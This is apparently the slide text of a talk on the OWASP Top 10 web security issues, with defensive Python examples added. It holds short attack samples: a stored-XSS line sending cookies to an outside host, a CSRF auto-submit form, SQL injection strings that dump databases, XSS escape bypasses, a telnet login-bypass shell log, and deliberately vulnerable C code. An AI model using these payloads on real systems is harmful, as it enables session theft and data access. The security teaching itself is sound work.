1. The top 10 security issues
in web applications
ir. Walter Belgers, CISSP, CISA
2. Walter Belgers
• Principal Security Consultant and
Partner at Madison Gurkha B.V.
• Close to 20 years of professional experience
in technical IT security
3. • Madison Gurkha supports organisations with high
quality services to efficiently identify, decrease and
prevent IT security risks
• With a focus on technical security aspects
7. OWASP TOP-10 2010
A1 - Injection
A2 - Cross Site Scripting (XSS)
A3 - Broken Authentication and Session Management
A4 - Insecure Direct Object References
A5 - Cross Site Request Forgery (CSRF)
A6 - Security Misconfiguration
A7 - Insecure Cryptographic Storage
A8 - Failure to Restrict URL Access
A9 - Insufficient Transport Layer Security
A10 - Unvalidated Redirects and Forwards
8. A10 - Redirects
• The site sends you to a URL that can be
manipulated
• That in turn can be encoded in a normal looking
URL
• Phishing attack
10. A9 - TLS
• HTTP versus HTTPS
• Protocol: SSLv2, SSLv3, TLSv1
• Crypto-algorithm: several
• Certificates
• Marking session cookies as ‘secure’
11. A9 - TLS
• The purpose of SSL
• Actually only useful for untrusted (WiFi-)networks
• Do you pay attention all of the time?
• VPN
• Firefox (Chrome) plugin: perspectives
13. A8 - Restricting URL’s
• Page can be retrieved without authentication
• Programming error
• Page can only be retrieved if you know the “secret URL”
• “Security through obscurity”
14. <script language="javascript">
<!--//
/* This Script allows people to enter by using a form that asks for a
   UserID and Password */
function pasuser(form) {
  if (form.id.value == "buyers") {
    if (form.pass.value == "gov1996") {
      location = "http://officers.federalsuppliers.com/agents.html"
    } else {
      alert("Invalid Password")
    }
  } else {
    alert("Invalid UserID")
  }
}
//-->
</script>
16. A7 - Crypt. Storage
• Data in a database should (maybe partially) be
encrypted/hashed
• Passwords, credit card data, ..
• Of importance when data leaks out
20. Exploits
[~] walter> telnet -l '-fbin' 194.151.35.251
Trying 194.151.35.251...
Connected to blade.madison-gurkha.com.
Escape character is '^]'.
Last login: Tue Sep 25 09:52:33 from 194.151.35.85
Sun Microsystems Inc. SunOS 5.10 Generic January 2005
$ id
uid=2(bin) gid=2(bin)
$
22. - Nikto v2.1.3/2.1.4
+ Target Host: www.<host>.nl
+ Target Port: 80
+ GET /0WAEdrRg.php: Retrieved x-powered-by header: ASP.NET
+ GET /0WAEdrRg.axd: Retrieved x-aspnet-version header: 2.0.50727
+ GET /robots.txt: robots.txt contains 36 entries which should be manually viewed.
+ HEAD /: Microsoft-IIS/6.0 appears to be outdated (4.0 for NT 4, 5.0 for Win2k, current is at least 7.5)
+ GET /: Allowed HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ GET /: Public HTTP Methods: OPTIONS, TRACE, GET, HEAD, POST
+ GET /webmail/blank.html: /webmail/blank.html: IlohaMail 0.8.10 contains an XSS vulnerability. Previous versions contain other non-descript vulnerabilities.
+ GET /webmail/: /webmail/: Web based mail package installed.
+ OSVDB-3093: GET /webmail/lib/emailreader_execute_on_each_page.inc.php: /webmail/lib/emailreader_execute_on_each_page.inc.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3093: GET /webmail/src/read_body.php: /webmail/src/read_body.php: This might be interesting... has been seen in web logs from an unknown scanner.
+ OSVDB-3092: GET /er/: /er/: This might be interesting... potential country code (Eritrea)
23. Configuration files
• Old files (x.bak, x.old, x~, Copy of x)
• Google cache, Way Back machine
• .htaccess files
• /robots.txt
• Source revision control files
• Include files
• PHP files not ending in .php
27. A5 - CSRF
• Cross Site
• The attack page is on the site of the attacker
• Must be visited (e-mail?)
• Request Forgery
• Often a POST-request with specially
constructed values
• You have to be logged in to the target site
28. CSRF in a CMS
<form name="csrf" action="http://cms.example.com/?page=/&action=admin&subaction=editgroups&groupname=admin" method="post">
<input type="hidden" name="txtUserEmail" value="myemail@example.com">
<input type="hidden" name="btnAddUserToGroup" value="Add User to Group">
</form>
<script>
document.csrf.submit();
</script>
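The server-side check that defeats the forged form above, as an added example that is not the talk's own code: the CMS stores a random token per login session, puts it in a hidden field of the forms it renders itself, and rejects any POST that does not carry it. The session store, field name csrf_token and the handler signature are assumptions for the example; the two form fields are the ones from the slide.

```python
import hmac
import secrets

# Constructed in-memory session store (a real CMS keeps this server-side per login).
SESSIONS = {}

def new_session():
    """Log a user in: fresh session id plus a fresh, unguessable CSRF token (the 'nonce' of slide 68)."""
    sid = secrets.token_hex(16)
    SESSIONS[sid] = {"csrf_token": secrets.token_urlsafe(32)}
    return sid

def csrf_token_for(sid):
    # Only pages rendered by the CMS itself get this value into their hidden field.
    return SESSIONS[sid]["csrf_token"]

def handle_editgroups(sid, form):
    """Handle the editgroups POST. form is a dict of POST fields; returns (status, message)."""
    sess = SESSIONS.get(sid)
    if sess is None:
        return 401, "not logged in"
    # The attacker's page cannot read the victim's token (same-origin policy), so the
    # forged POST from slide 28 arrives without it and is refused before any change is made.
    supplied = form.get("csrf_token", "")
    if not hmac.compare_digest(supplied, sess["csrf_token"]):
        return 403, "CSRF token missing or wrong"
    return 200, "added %s to group" % form["txtUserEmail"]

if __name__ == "__main__":
    sid = new_session()
    forged = {"txtUserEmail": "myemail@example.com",
              "btnAddUserToGroup": "Add User to Group"}
    print(handle_editgroups(sid, forged))                            # (403, ...)
    print(handle_editgroups(sid, dict(forged, csrf_token=csrf_token_for(sid))))  # (200, ...)
```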
32. A3 - Broken Session Mgmt
• Is there a session timeout?
• How many simultaneous logins are allowed?
• Can you change systems within a session (different IP number)?
• Is there a logout button?
• Are credentials sent using a secure connection?
(A9)
• How often can you try logging in per user?
33. A3 - Broken Session Mgmt
• Do you get to know what was wrong when
logging in fails?
• Does the server (also) invalidate the session
cookie when logging out?
• Does the URL contain session id’s?
https://example.com/prepaid/customer/login.html;jsessionid=F0382A6E8172DC7B8D90599B12AECE16
• Session fixation problems
34. A2 - XSS
• Cross Site
• The victim’s browser redirects from the
vulnerable site to the attacker’s site
• Scripting
• This happens by executing JavaScript in the
victim’s browser
• Goal: stealing session credentials (cookies)
35. Stored XSS
• The attacker can leave behind input that is being
shown to (other) visitors of the site
• Profile information
• Messages
• ...
36. Stored XSS
Your message:
This is my message.
<script>document.location='http://example.com/'+document.cookie</script>
40. A1 - Injection
• Problem: data gets mingled with “program code”
• PHP, Perl, ..
• But also: SQL, LDAP, ..
41. Old problem
• In-band signalling
• Well-known from telephony
• Hot again! (photo: woz.org)
42. Typical setup
[Diagram: Internet --HTTP--> www server --SQL--> db server, both on the internal network]
43. SQL injection
Your name please: walter
Name: Balance:
walter €100
SELECT * FROM users WHERE name="$name"
SELECT * FROM users WHERE name="walter"
44. SQL injection
Your name please: " OR "a"="a
Name: Balance:
walter €100
guido €1000
hans €2000
SELECT * FROM users WHERE name="$name"
SELECT * FROM users WHERE name="" OR "a"="a"
45. Real-Life Example
• Bank site
• With a search function
• We enter as search string: <script>alert('test')</script>
• This yields: Error running Macro 'odbc': Error in line 2: Incorrect syntax near 'test'. (SELECT nr, subject FROM pagedb WHERE (subject LIKE '%<script>alert('test')</script>' order by subject) (source: Microsoft OLE DB Provider for SQL Server)
46. SQL injection
• Input frut’) or 1=1-- yields all pages
• Input frut’) union select 0, @@version from
pagedb-- yields information about the type of
software being used
• Input frut’) union select dbid, name from
master..sysdatabases-- yields a list of databases
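Slides 43 and 44 run end to end, as an added example that is not part of the talk: the same users table queried once by pasting the name into the SQL text and once with a bound parameter. The table contents are constructed from the slide; SQLite is used here, so strings are delimited with single quotes where the slide shows double quotes.

```python
import sqlite3

# Constructed sample data mirroring the table on slides 43-44.
ROWS = [("walter", 100), ("guido", 1000), ("hans", 2000)]

def make_db():
    conn = sqlite3.connect(":memory:")
    conn.execute("CREATE TABLE users (name TEXT, balance INTEGER)")
    conn.executemany("INSERT INTO users VALUES (?, ?)", ROWS)
    return conn

def lookup_vulnerable(conn, name):
    # Slide 43: the input is pasted into the SQL text, so data turns into program code
    # (the in-band signalling problem of slide 41).
    sql = "SELECT name, balance FROM users WHERE name='%s'" % name
    return sorted(conn.execute(sql).fetchall())

def lookup_safe(conn, name):
    # Parameterised query: the statement is parsed first and the value bound afterwards,
    # so no character in the input can change the statement's structure.
    sql = "SELECT name, balance FROM users WHERE name=?"
    return sorted(conn.execute(sql, (name,)).fetchall())

if __name__ == "__main__":
    db = make_db()
    payload = "' OR 'a'='a"                   # slide 44's input, in SQLite quoting
    print(lookup_vulnerable(db, "walter"))    # one row, as on slide 43
    print(lookup_vulnerable(db, payload))     # every row, as on slide 44
    print(lookup_safe(db, payload))           # no rows: nobody is literally named that
```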
47. Injection
• Input fields
• Are sometimes/often “secured” with JavaScript-
code
• That code runs in the browser
• If the user allows it to..
48. Injection
• In addition to input fields:
• URL’s (GET requests)
• Hidden fields (POST requests)
• Cookies
• Other data in the HTTP-headers (e.g. referer)
49. Local proxy
[Diagram: the setup of slide 42 (Internet --HTTP--> www server --SQL--> db server on the internal network), with a local proxy inserted between the browser and the web server]
58. Input filtering
• Helps prevent A1, A2, A4, A8 and A10!
• Check all input before storing, processing or
showing it
• Data in URL’s, forms, cookies, HTTP-headers,
etc.
60. Input filtering
• White-list filtering: only allow certain characters
• Black-list filtering: remove ‘dangerous’ characters
61. Black list filtering
<script>
• <SCRIPT>
• <␣script>
• %3Cscript>
• “<sc”+“ript”>
• <b onmouseover=“...”>
62. Escaping of output
• Rewriting ‘dangerous characters’
• For example &lt; instead of <
• The rewriting depends on where it must be done!
63. Escaping of output
• In the template: <p>%(foo)</p>
• We request: http://example.com/?foo=<script>alert(document.cookie)</script>
• We get: <p><script>alert(document.cookie)</script></p>
• Escaping: rewriting < > into &lt; &gt;
64. Escaping of output
• In the template: <input name="foo" value="%(foo)" />
• We request: http://example.com/?foo="%20onmouseover="alert(document.cookie)
• We get: <input name="foo" value="" onmouseover="alert(document.cookie)" />
• Escaping: rewriting " into &quot;
65. Escaping of output
• In the template: <script>var foo='%(foo)', bar='%(bar)';</script>
• We request: http://example.com/?foo= &bar=;alert(document.cookie);//
• We get: <script>var foo='', bar=';alert(document.cookie);//
67. Secure programming
• Not many programmers have a background in ‘secure programming’
#include <stdio.h>
#include <stdlib.h>
#include <string.h>

int main(int argc, char *argv[]) {
    char buf[2000];
    int len;
    len = atoi(argv[1]);
    /* Only the upper bound is checked: a negative len passes the test and is
       converted to a huge size_t by memcpy, so the buffer is overrun anyway. */
    if (len > 2000) {
        printf("Too much input!\n");
        exit(-1);
    }
    memcpy(buf, argv[2], len);
    return 0;
}
68. Tips and tricks
• A2: use the ‘HttpOnly’ option for session cookies
• A3: generate a new session
cookie on the login page
• A5: use a nonce
• Sometimes, a framework can help
69. What to do? (1)
• Teach programmers how to write secure code
• Create a security specification next to the functional specification
• Also when the application is bought from a supplier
• Abuse cases
• Auditing
70. What to do? (2)
• If All Else Fails... (and it will)
• Multiple layers of defense
(prevention)
• Logging and monitoring (detection)
• Emergency plan (reaction)
71. Web application security
• There are no fantastic automated tools
• With a good brain and tools like Burp Suite, every web application can be tested well